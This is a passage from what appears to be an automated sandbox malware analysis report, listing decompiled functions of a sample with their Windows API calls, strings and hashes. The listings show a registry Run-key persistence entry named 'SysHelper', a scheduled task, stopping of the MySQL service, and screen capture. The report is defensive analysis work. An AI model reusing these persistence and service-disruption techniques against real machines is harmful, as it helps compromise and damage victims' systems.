                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                        • String ID: failed with error
                                                                                                        • API String ID: 4182478520-946485432
                                                                                                        • Opcode ID: b80cb97fc40d3c54e0bd5c59238d1d4c115d338f1bfddc724636e5e1587ad4e3
                                                                                                        • Instruction ID: b43382048a42c7a4ad593959008ab4ee48ea5b5ac9ea25172c3e51526cf6d64c
                                                                                                        • Opcode Fuzzy Hash: b80cb97fc40d3c54e0bd5c59238d1d4c115d338f1bfddc724636e5e1587ad4e3
                                                                                                        • Instruction Fuzzy Hash: 5221B732A4021CBBE7116BA19C46FAE7A78EF85B51F100055FB09B7190DE741D41BBE5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F549A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00F54B72), ref: 00F549C7
                                                                                                          • Part of subcall function 00F549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F549D7
                                                                                                          • Part of subcall function 00F549A0: GetDesktopWindow.USER32 ref: 00F549FB
                                                                                                          • Part of subcall function 00F549A0: GetProcessWindowStation.USER32(?,00F54B72), ref: 00F54A01
                                                                                                          • Part of subcall function 00F549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00F54B72), ref: 00F54A1C
                                                                                                          • Part of subcall function 00F549A0: GetLastError.KERNEL32(?,00F54B72), ref: 00F54A2A
                                                                                                          • Part of subcall function 00F549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00F54B72), ref: 00F54A65
                                                                                                          • Part of subcall function 00F549A0: _wcsstr.LIBCMT ref: 00F54A8A
                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F82316
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00F82323
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00F82338
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F82341
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 00F8234E
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F8235C
                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00F8236E
                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 00F823CA
                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 00F823D6
                                                                                                        • SelectObject.GDI32(?,?), ref: 00F82436
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F8243D
                                                                                                        • DeleteDC.GDI32(?), ref: 00F8244A
                                                                                                        • DeleteDC.GDI32(?), ref: 00F82450
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                        • API String ID: 151064509-1805842116
                                                                                                        • Opcode ID: 5a2b73211f98593a0215d7fcab6afe7f55c506450433e6ab82b4bcedf562a70f
                                                                                                        • Instruction ID: 7d81cac7654ac4224bd60ee493053d412c548c15a426e85beb76423003ec494b
                                                                                                        • Opcode Fuzzy Hash: 5a2b73211f98593a0215d7fcab6afe7f55c506450433e6ab82b4bcedf562a70f
                                                                                                        • Instruction Fuzzy Hash: 7C419671944304EBD310AB759D46F6FBBF8FF89710F000519FA54D72A1E775A800ABA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _strncmp
                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                        • API String ID: 909875538-2733969777
                                                                                                        • Opcode ID: 232e13fa1c4e14f054986050090cb4371b5f88172dad2856e098ae14ae4edf98
                                                                                                        • Instruction ID: 4484e46529c5fcc12cb083a9eaade3db982493028d2446f7d97bcf13f84f792b
                                                                                                        • Opcode Fuzzy Hash: 232e13fa1c4e14f054986050090cb4371b5f88172dad2856e098ae14ae4edf98
                                                                                                        • Instruction Fuzzy Hash: 20F1EA72A083416BE721EA64DC42F9BB7D89F55714F040829FE8CD7283E774DA09A793
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F25A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1503006713-0
                                                                                                        • Opcode ID: c92b08680f84de9bed78b7d46287e37ac731e50126827fd776372008fcd7e3f9
                                                                                                        • Instruction ID: 8220ec487cf029e0ad4324a6fa0f2ba028da4ce0e4c50ab7049f521e048427ee
                                                                                                        • Opcode Fuzzy Hash: c92b08680f84de9bed78b7d46287e37ac731e50126827fd776372008fcd7e3f9
                                                                                                        • Instruction Fuzzy Hash: 88219F36509A31ABE7217F64FC03E1EBBD4DF81B61F244429F484990A2EF799810BB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F11B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F11BB0
                                                                                                        • CoCreateInstance.OLE32(00FCE908,00000000,00000001,00FCD568,00000000), ref: 00F11BC8
                                                                                                        • CoUninitialize.OLE32 ref: 00F11BD0
                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00F11C12
                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00F11C22
                                                                                                        • lstrcatW.KERNEL32(?,01000050), ref: 00F11C3A
                                                                                                        • lstrcatW.KERNEL32(?), ref: 00F11C44
                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00F11C68
                                                                                                        • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00F11C7A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                        • String ID: \shell32.dll
                                                                                                        • API String ID: 679253221-3783449302
                                                                                                        • Opcode ID: 448aeebdff63bf5f404cfbbe593098637e66f007c97e8acd803bc219647af975
                                                                                                        • Instruction ID: c6a92ec43bbbbf76a5387ee818713c7890548c208b779ef269f906cb427b3483
                                                                                                        • Opcode Fuzzy Hash: 448aeebdff63bf5f404cfbbe593098637e66f007c97e8acd803bc219647af975
                                                                                                        • Instruction Fuzzy Hash: E6413D70A4021DAFDB10DBA4DD89FEA7BBCEF48705F004499F609DB190D6B1AA85DB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00F54B72), ref: 00F549C7
                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F549D7
                                                                                                        • GetDesktopWindow.USER32 ref: 00F549FB
                                                                                                        • GetProcessWindowStation.USER32(?,00F54B72), ref: 00F54A01
                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00F54B72), ref: 00F54A1C
                                                                                                        • GetLastError.KERNEL32(?,00F54B72), ref: 00F54A2A
                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00F54B72), ref: 00F54A65
                                                                                                        • _wcsstr.LIBCMT ref: 00F54A8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                        • API String ID: 2112994598-1672312481
                                                                                                        • Opcode ID: 42f86b8ce5b4b255450407ff41d538b6734e671bd03f42516cfa306865ad789d
                                                                                                        • Instruction ID: 0f8a0f2428d5d546389e52abd9e67130253fd2b778374128fdddcba4f85a9494
                                                                                                        • Opcode Fuzzy Hash: 42f86b8ce5b4b255450407ff41d538b6734e671bd03f42516cfa306865ad789d
                                                                                                        • Instruction Fuzzy Hash: 3A313C31E402089BDB20DFB9EC46BAE7778EF44325F100256FD1AD71D0EB38A9449B91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F54AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F4,00F54C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00F5480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00F51D37,00000000,00F0CDAE,00000001,00000001), ref: 00F54AFA
                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00F54B05
                                                                                                        • __vfwprintf_p.LIBCMT ref: 00F54B27
                                                                                                          • Part of subcall function 00F2BDCC: _vfprintf_helper.LIBCMT ref: 00F2BDDF
                                                                                                        • vswprintf.LIBCMT ref: 00F54B5D
                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00F54B7E
                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00F54BA2
                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00F54BA9
                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00F54BD3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                        • API String ID: 277090408-1348657634
                                                                                                        • Opcode ID: 720fe4ba42480d3ce5ab2f0d158243e5ff1d1cf073aaa297c3f9bddfbd69fd03
                                                                                                        • Instruction ID: 7dcd92b1c95910ede3f35dc60f4e9e193f19de70845ccc765c6f1a885e894920
                                                                                                        • Opcode Fuzzy Hash: 720fe4ba42480d3ce5ab2f0d158243e5ff1d1cf073aaa297c3f9bddfbd69fd03
                                                                                                        • Instruction Fuzzy Hash: FC21D771A48304BBE771A760DC47FEB7798AF98700F444819FA99C61D0EAB89444A793
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F12360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00F12389
                                                                                                        • _memset.LIBCMT ref: 00F123B6
                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 00F123DE
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F123E7
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F123F4
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00F123FF
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1240E
                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 00F12422
                                                                                                        Strings
                                                                                                        • SysHelper, xrefs: 00F123D6
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00F1237F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                        • API String ID: 122392481-4165002228
                                                                                                        • Opcode ID: 712a35411257d4295f6a2b29035a4ab753fc745c91611aaee5e18e32767cae59
                                                                                                        • Instruction ID: 3a5c88f668f11bca9b33d65a43266547eec259b823e46e860892b0c1befebb53
                                                                                                        • Opcode Fuzzy Hash: 712a35411257d4295f6a2b29035a4ab753fc745c91611aaee5e18e32767cae59
                                                                                                        • Instruction Fuzzy Hash: 9E11267294020DABDF10DFA0DD4AFEE77BCBB04705F0445A5F649E2151DBB4AA88AB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F18000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 0b8b5c0e1dfd96fb903d1f4186f8298a73f4262941c6081b04ff659d7b89fb03
                                                                                                        • Instruction ID: 70bf0f4a8c651d772914835b32488996f46d79e2ea3eb058aecea7116ac0702c
                                                                                                        • Opcode Fuzzy Hash: 0b8b5c0e1dfd96fb903d1f4186f8298a73f4262941c6081b04ff659d7b89fb03
                                                                                                        • Instruction Fuzzy Hash: C0C19172700649DFDB18CF48CE81AEE77A6EF44784B24492DE851CB741DB30ED86AB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F0DAEB
                                                                                                        • CoCreateInstance.OLE32(00FD4F6C,00000000,00000001,00FD4F3C,?,?,00FCA948,000000FF), ref: 00F0DB0B
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F0DBD6
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,00FCA948,000000FF), ref: 00F0DBE3
                                                                                                        • _memset.LIBCMT ref: 00F0DC38
                                                                                                        • CoUninitialize.OLE32 ref: 00F0DC92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                        • API String ID: 330603062-1376107329
                                                                                                        • Opcode ID: f87af90eb3d666a5a09da6a6fc986537d6eeacbc00757874b9a2db0912356c0c
                                                                                                        • Instruction ID: a54349e9b2294566b945ab6e48c94170f0bfd0bbb8d999a93d12972380754768
                                                                                                        • Opcode Fuzzy Hash: f87af90eb3d666a5a09da6a6fc986537d6eeacbc00757874b9a2db0912356c0c
                                                                                                        • Instruction Fuzzy Hash: A7510470A40209AFDB00DF94CC89FAEB7B9FF88705F108459F509AB290DB75A945CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F11A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00F11A1D
                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00F11A32
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00F11A46
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00F11A5B
                                                                                                        • Sleep.KERNEL32(?), ref: 00F11A75
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00F11A80
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00F11A9E
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00F11AA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
